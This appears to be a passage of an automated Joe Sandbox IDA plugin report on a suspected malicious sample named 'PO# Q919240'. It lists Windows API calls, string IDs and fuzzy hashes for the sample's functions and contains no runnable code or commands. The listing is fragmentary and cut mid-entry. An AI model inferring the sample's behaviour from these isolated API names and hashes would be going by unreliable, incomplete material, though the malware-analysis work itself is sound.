                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                Strings
                Similarity
                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                • String ID: crts
                • API String ID: 943502515-3724388283
                • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                Strings
                Similarity
                • API ID: ErrorMode$LabelVolume
                • String ID: \VH
                • API String ID: 2006950084-234962358
                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • GetMenuItemInfoW.USER32 ref: 00449727
                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                • DrawMenuBar.USER32 ref: 00449761
                Strings
                Similarity
                • API ID: Menu$InfoItem$Draw_malloc
                • String ID: 0
                • API String ID: 772068139-4108050209
                • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                APIs
                Strings
                Similarity
                • API ID: _wcslen$_wcscpy
                • String ID: 3, 3, 8, 1
                • API String ID: 3469035223-357260408
                • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                Strings
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpCloseHandle
                • API String ID: 2574300362-3530519716
                • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                Strings
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpCreateFile
                • API String ID: 2574300362-275556492
                • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                Strings
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpSendEcho
                • API String ID: 2574300362-58917771
                • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                APIs
                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                Strings
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: RegDeleteKeyExW$advapi32.dll
                • API String ID: 2574300362-4033151799
                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                APIs
                • VariantInit.OLEAUT32(?), ref: 0047950F
                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                • VariantClear.OLEAUT32(?), ref: 00479650
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$AllocClearCopyInitString
                • String ID:
                • API String ID: 2808897238-0
                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                APIs
                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                • __itow.LIBCMT ref: 004699CD
                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                • __itow.LIBCMT ref: 00469A97
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$__itow
                • String ID:
                • API String ID: 3379773720-0
                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                APIs
                • GetWindowRect.USER32(?,?), ref: 00449A4A
                • ScreenToClient.USER32(?,?), ref: 00449A80
                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$ClientMoveRectScreen
                • String ID:
                • API String ID: 3880355969-0
                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                • String ID:
                • API String ID: 2782032738-0
                • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                APIs
                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                • GetWindowRect.USER32(?,?), ref: 00441722
                • PtInRect.USER32(?,?,?), ref: 00441734
                • MessageBeep.USER32(00000000), ref: 004417AD
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Rect$BeepClientMessageScreenWindow
                • String ID:
                • API String ID: 1352109105-0
                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                APIs
                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateHardLink$DeleteErrorFileLast
                • String ID:
                • API String ID: 3321077145-0
                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                • __isleadbyte_l.LIBCMT ref: 004208A6
                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                APIs
                • GetParent.USER32(?), ref: 004503C8
                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Proc$Parent
                • String ID:
                • API String ID: 2351499541-0
                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                • TranslateMessage.USER32(?), ref: 00442B01
                • DispatchMessageW.USER32(?), ref: 00442B0B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Message$Peek$DispatchTranslate
                • String ID:
                • API String ID: 1795658109-0
                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                APIs
                • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                • GetCaretPos.USER32(?), ref: 004743B2
                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                • GetForegroundWindow.USER32 ref: 004743EE
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                • String ID:
                • API String ID: 2759813231-0
                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                APIs
                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                • _wcslen.LIBCMT ref: 00449519
                • _wcslen.LIBCMT ref: 00449526
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend_wcslen$_wcspbrk
                • String ID:
                • API String ID: 2886238975-0
                • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __setmode$DebugOutputString_fprintf
                • String ID:
                • API String ID: 1792727568-0
                • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                APIs
                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Long$AttributesLayered
                • String ID:
                • API String ID: 2169480361-0
                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                APIs
                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                • lstrlenW.KERNEL32(?), ref: 00434CF6
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                Strings
